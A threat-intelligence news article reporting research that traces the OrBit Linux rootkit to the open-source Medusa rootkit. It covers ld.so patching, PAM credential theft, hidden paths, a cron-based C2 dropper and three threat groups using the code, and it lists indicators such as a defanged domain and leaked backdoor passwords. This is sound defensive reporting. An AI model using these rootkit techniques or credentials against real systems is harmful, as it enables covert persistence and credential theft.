Unmasked Origin: Infamous “OrBit” Linux Rootkit Exposed as a Fork of Open-Source Medusa

In July 2022, security researchers dropped the first analysis of OrBit, a sophisticated, then-undocumented Linux userland rootkit. It immediately put defenders on high alert due to its sweeping capabilities: comprehensive libc hooking, passive SSH backdoor access, and predatory PAM-based credential harvesting. At the time, OrBit appeared to be a highly customized, bespoke creation tied to a single operator fingerprint.

It wasn’t. A definitive deep dive by Nicole, a malware analyst and reverse engineer at Intezer, has blown the lid off OrBit’s true origin story. By pulling and meticulously analyzing over a dozen samples spanning from 2022 through 2026, the research proves that OrBit is not a groundbreaking piece of malware authorship. Instead, it is a repackaged and selectively weaponized build of Medusa, an open-source LD_PRELOAD rootkit that was published on GitHub in December 2022.

As Nicole summarizes in her report, “The story of OrBit’s four-year evolution is not one of novel development; it’s the story of how a publicly available rootkit was forked, configured, and redeployed.”

To understand how this shared code footprint stayed under the radar for so long, one must look at how OrBit operates. Deployed as a shared library (.so), it achieves absolute persistence on a system by patching the dynamic linker, specifically modifying ld.so to force the malicious library into every single running process.

Crucially, it traditionally operates as a passive implant. It doesn’t generate noisy outbound traffic or continuously reach out to a Command-and-Control (C2) server; instead, the attacker simply connects in silently through an SSH backdoor. Once inside, it hooks into PAM (Pluggable Authentication Modules) functions to passively harvest credentials from SSH and sudo attempts, saving the stolen passwords to a hidden directory (/lib/libntpVnQE6mk/ or /lib/libseconf/) that is systematically cloaked from administrators by the rootkit’s own file-hiding hooks.

Nicole’s differential analysis revealed that the malware operators haven’t been writing new code. Rather, they’ve been toggling features like options on a menu, splitting the malware’s evolution into two distinct parallel lineages:

• Lineage A (“Full” Build): A heavily featured variant tracking closely with the original code, utilizing advanced capabilities.
• Lineage B (“Lite” Fork): A stripped-down, stealthier version appearing between 2023 and 2024 that drops entire capability domains—such as PAM interception, packet capturing (pcap), and TCP-port hiding—in exchange for a smaller footprint.

Over the last four years, different criminal elements have customized these lineages by rotating XOR encryption keys, shifting install paths, swapping backdoor credentials, and turning on pre-existing features within the upstream source code.

For example, when a custom xread wrapper emerged in 2023 to bypass the malware’s own I/O hooks—preventing the corruption of Git operations and SSH protocol streams—it looked like an innovative patch. It wasn’t. The code for xread was already sitting quietly inside Medusa’s advanced hook file (src/rknet.c) from day one. The operators simply changed their Makefile to link it in.

Similarly, a massive capability jump occurred in 2025 when Lineage A samples began hooking pam_sm_authenticate. This shifted the backdoor from a passive credential harvester to an active gatekeeper capable of forging authentication outcomes. Again, this power was already natively built into the foundational Medusa source code.

Because Medusa is publicly accessible, tracking OrBit has completely shattered the traditional “one malware, one threat actor” attribution model. Nicole’s analysis confirms that at least three entirely unrelated threat clusters have weaponized this exact codebase for completely different objectives:

1. The state-sponsored espionage group tracked as UNC3886 deployed a 2024 Lineage A cluster featuring a unique 0xAA XOR key rotation. Mandiant’s tracking of this group exposed their use of “MEDUSA” against VMware and Juniper infrastructure. Nicole’s reverse-engineering efforts proved cross-attribution seamlessly: the espionage group’s binary left behind a careless plaintext artifact—a redirected strace file containing the literal word “orbit”, confirming the builds are identical.
2. The eCrime adversary BLOCKADE SPIDER (known for orchestrating Embargo ransomware campaigns) has actively adopted the OrBit backdoor since at least 2024. They have been caught leveraging its stealthy persistence mechanisms specifically to maintain access to hijacked virtualization environments, such as VMware vCenter infrastructure.
3. Perhaps the most alarming operational shift discovered in 2025 samples was a brand-new, two-stage “infector” architecture. This variant broke OrBit’s long-standing rule of being a purely passive implant by introducing its first direct outbound C2 communication channel via an automated cron job fetching payloads from the domain cf0[.]pw.

In a fascinating historical twist, Nicole discovered that the structure of this new dropper is completely identical to a loader used six years ago in the 2020 Linux-based RHOMBUS botnet campaign, utilizing the exact same infrastructure hosted in Russia.

The emergence of fresh Lineage A samples well into 2026—complete with fresh credential rotations like jokerteam and 57ill4Cu63—proves this open-source toolkit isn’t going away anytime soon.